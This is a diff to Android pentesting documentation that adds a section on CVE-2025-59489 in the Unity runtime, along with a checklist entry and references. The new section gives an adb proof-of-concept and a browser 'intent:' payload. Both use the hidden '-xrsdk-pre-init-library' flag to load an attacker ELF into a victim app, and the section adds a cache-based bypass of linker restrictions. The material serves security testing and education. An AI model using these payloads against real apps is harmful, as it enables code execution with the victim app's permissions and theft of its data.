CVE-2025-59489 Arbitrary Code Execution in Unity Runtime

src/mobile-pentesting/android-app-pentesting/intent-injection.md

@@ -53,6 +53,63 @@ Mitigations
 - Only enable JavaScript after all checks pass and just before loading trusted content.
 - Avoid exposing bridges to untrusted origins.
 
+## Unity Runtime: Intent-to-CLI extras → pre-init native library injection (RCE)
+
+Unity-based Android apps typically use `com.unity3d.player.UnityPlayerActivity` (or `UnityPlayerGameActivity`) as the entry Activity. Unity’s Android template treats a special Intent extra named `unity` as a string of command-line flags for the Unity runtime. When the entry Activity is exported (default in many templates), any local app – and sometimes a website if `BROWSABLE` is present – can supply this extra.
+
+A dangerous, undocumented flag leads to native code execution during very early process initialization:
+
+- Hidden flag: `-xrsdk-pre-init-library <absolute-path>`
+- Effect: `dlopen(<absolute-path>, RTLD_NOW)` very early in init, loading attacker-controlled ELF inside the target app’s process with its UID and permissions.
+
+Reverse-engineering excerpt (simplified):
+```c
+// lookup the arg value
+initLibPath = FUN_00272540(uVar5, "xrsdk-pre-init-library");
+// load arbitrary native library early
+lVar2 = dlopen(initLibPath, 2); // RTLD_NOW
+```
+
+Why it works
+- The Intent extra `unity` is parsed into Unity runtime flags.
+- Supplying the pre-init flag points Unity at an attacker-controlled ELF path within an allowed linker namespace path (see constraints below).
+
+Conditions for exploitation
+- The Unity entry Activity is exported (commonly true by default).
+- For one-click remote via browser: the entry Activity also declares `android.intent.category.BROWSABLE` so extras can be passed from an `intent:` URL.
+
+Local exploitation (same device)
+1) Place a payload ELF at a path readable by the victim app. Easiest: ship a malicious library in your own attacker app and ensure it is extracted under `/data/app/.../lib/<abi>/` by setting in the attacker’s manifest:
+```xml
+<application android:extractNativeLibs="true" ...>
+```
+2) Launch the victim’s Unity activity with the CLI pre-init flag in the `unity` extra. Example ADB PoC:
+```bash
+adb shell am start \
+  -n com.victim.pkg/com.unity3d.player.UnityPlayerActivity \
+  -e unity "-xrsdk-pre-init-library /data/app/~~ATTACKER_PKG==/lib/arm64/libpayload.so"
+```
+3) Unity calls `dlopen("/data/.../libpayload.so", RTLD_NOW)`; your payload runs in the victim process, inheriting all its app permissions (camera/mic/network/storage, etc.) and access to in-app sessions/data.
+
+Notes
+- The exact `/data/app/...` path varies across devices/installs. An attacker app can retrieve its own native lib dir at runtime via `getApplicationInfo().nativeLibraryDir` and communicate it to the trigger.
+- The file need not end with `.so` if it is a valid ELF – `dlopen()` cares about ELF headers, not extensions.
+
+Remote one‑click via browser (conditional)
+If the Unity entry activity is exported with `BROWSABLE`, a website can pass extras via an `intent:` URL:
+```text
+intent:#Intent;package=com.example.unitygame;scheme=whatever;\
+S.unity=-xrsdk-pre-init-library%20/data/local/tmp/malicious.so;end;
+```
+However, on modern Android the dynamic linker namespaces and SELinux block loading from many public paths (e.g., `/sdcard/Download`). You’ll see errors like:
+```
+library "/sdcard/Download/libtest.so" ("/storage/emulated/0/Download/libtest.so") needed
+or dlopened by "/data/app/.../lib/arm64/libunity.so" is not accessible for the
+namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/com.example.unitygame"]
+```
+Bypass strategy: target apps that cache attacker-controlled bytes under their private storage (e.g., HTTP caches). Because permitted paths include `/data` and the app’s private dir, pointing `-xrsdk-pre-init-library` at an absolute path inside the app’s cache can satisfy linker constraints and yield code execution. This mirrors prior cache-to-ELF RCE patterns experienced in other Android apps.
+
+
 ## Other classic Intent injection primitives
 
 - startActivity/sendBroadcast using attacker-supplied `Intent` extras that are later re-parsed (`Intent.parseUri(...)`) and executed.
@@ -219,5 +276,9 @@ Mitigations (developer checklist)
 - [CVE-2022-36837 – CVE.org](https://www.cve.org/CVERecord?id=CVE-2022-36837)
 - [CVE-2021-4438 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-4438)
 - [CVE-2020-14116 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-14116)
+- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/)
+- [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html)
+- [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01)
+- [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-checklist.md

@@ -29,6 +29,7 @@
   - [ ] Check if the application is in debug mode and try to "exploit" it
   - [ ] Check if the APK allows backups
   - [ ] Exported Activities
+    - [ ] Unity Runtime: exported UnityPlayerActivity/UnityPlayerGameActivity with a `unity` CLI extras bridge. Test `-xrsdk-pre-init-library <abs-path>` for pre-init `dlopen()` RCE. See [Intent Injection → Unity Runtime](android-app-pentesting/intent-injection.md).
   - [ ] Content Providers
   - [ ] Exposed services
   - [ ] Broadcast Receivers
@@ -75,4 +76,8 @@
 - [ ] [Read here](android-app-pentesting/index.html#obfuscating-deobfuscating-code)
 
 
-{{#include ../banners/hacktricks-training.md}}
+## References
+
+- [CVE-2025-59489 – Arbitrary Code Execution in Unity Runtime (blog)](https://flatt.tech/research/posts/arbitrary-code-execution-in-unity-runtime/)
+
+{{#include ../banners/hacktricks-training.md}}